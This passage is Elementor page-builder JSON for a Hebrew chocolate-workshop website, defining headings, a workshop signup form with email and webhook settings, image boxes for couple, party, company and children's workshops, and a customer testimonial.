\\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34415&lm_key=9f1e095b29bf436098e66ca5f1512f34\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd 